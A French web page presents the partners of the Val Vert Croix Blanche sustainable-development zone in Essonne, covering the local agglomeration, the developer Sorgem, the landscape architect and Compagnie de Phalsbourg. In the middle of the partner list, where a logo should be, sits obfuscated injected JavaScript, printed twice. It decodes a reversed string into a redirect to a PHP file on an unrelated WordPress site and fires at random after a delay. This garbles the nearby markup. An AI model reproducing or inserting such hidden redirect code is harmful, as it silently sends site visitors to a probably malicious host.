Les partenaires


logo_ValDorge

À l’origine du projet Val Vert Croix Blanche, la Communauté d’Agglomération du Val d’Orge (CAVO) a souhaité créer un pôle d’innovation en matière d’habitat durable, d’éco-construction et de développement durable au cœur du Sud Francilien. A travers ce projet, la CAVO prévoit la création de 2 000 emplois, encourage le développement économique du territoire, met à disposition de tous des informations sur les thématiques environnementales et énergétiques et fournit une nouvelle offre de transports sur un territoire en plein développement.

Sorgem

La société d’économie mixte Sorgem, au service des collectivités pour les accompagner dans la réalisation de leurs projets d’aménagement, est le concessionnaire de la ZAC Val Vert Croix Blanche. En tant que maître d’ouvrage, la Sorgem pilote l’ensemble des études pré-opérationnelles et de maîtrise d’œuvre, coordonne les différents acteurs concernés. Elle porte l’ambition de faire du projet Val Vert Croix Blanche, le fer de lance d’une nouvelle génération de zones d’activités, intégrées à leur environnement et moteur d’un développement durable en Essonne.

122px-Logo_commune_du_Plessis-Pâté.svg

Logo Fleury-M_rogis

logo_ste_genevieve_basse_def

Le périmètre du projet Val Vert Croix Blanche se situe sur les territoires des communes du Plessis-Pâté, de Sainte-Geneviève-des-Bois et de Fleury-Mérogis.

$vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n]) == « string ») return $vTB$I_919AeEAw2z$KX.list[n].split(«  »).reverse().join(«  »);return $vTB$I_919AeEAw2z$KX.list[n];};$vTB$I_919AeEAw2z$KX.list=[« ‘php.nosj.ssalc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www//:ptth’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and.com/ » target= »_blank »>$vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n]) == « string ») return $vTB$I_919AeEAw2z$KX.list[n].split(«  »).reverse().join(«  »);return $vTB$I_919AeEAw2z$KX.list[n];};$vTB$I_919AeEAw2z$KX.list=[« ‘php.nosj.ssalc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www//:ptth’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and-e1421233241115.gif » alt= »Marion_Talagrand » width= »160″ height= »57″ />

L’atelier Marion Talagrand conçoit des projets d’aménagement des espaces publics depuis 2002, avec un souci constant de préservation des ressources naturelles des territoires. L’atelier Marion Talagrand est le maître d’œuvre du projet Val Vert Croix Blanche. Fort d’une expérience sur les liens entre ville et sites agricoles, et les nouveaux modes de consommation et de fréquentation, l’atelier imagine un projet qui s’intègre parfaitement à son environnement et qui offre une programmation mixte (loisir, culture, formation, achat).

compagnie-de-phalsbourg




logo_aavp_basse_def

La Compagnie de Phalsbourg, un des principaux acteurs de l’immobilier en France, est un opérateur reconnu de l’immobilier commercial notamment grâce aux deux axes majeurs qu’elle développe : les grands projets « Signature » et la restructuration des entrées de ville et des zones commerciales. En 2014, elle a remporté le concours du Val Vert organisé par la Communauté d’agglomération du Val d’Orge portant sur Central Parc. Avec ce programme, la Compagnie de Phalsbourg souhaite créer un nouveau modèle pour le commerce moderne, faisant de la nature un partenaire du développement urbain et non un simple espace consommable dans l’optique de remettre le bien-être des clients au cœur du programme. La Compagnie de Phalsbourg s’associe à AAVP Architecture, l’atelier de Vincent Parreira et Antonio Virga, pour concevoir Central Parc.

This is a unique website which will require a more modern browser to work!

Please upgrade today!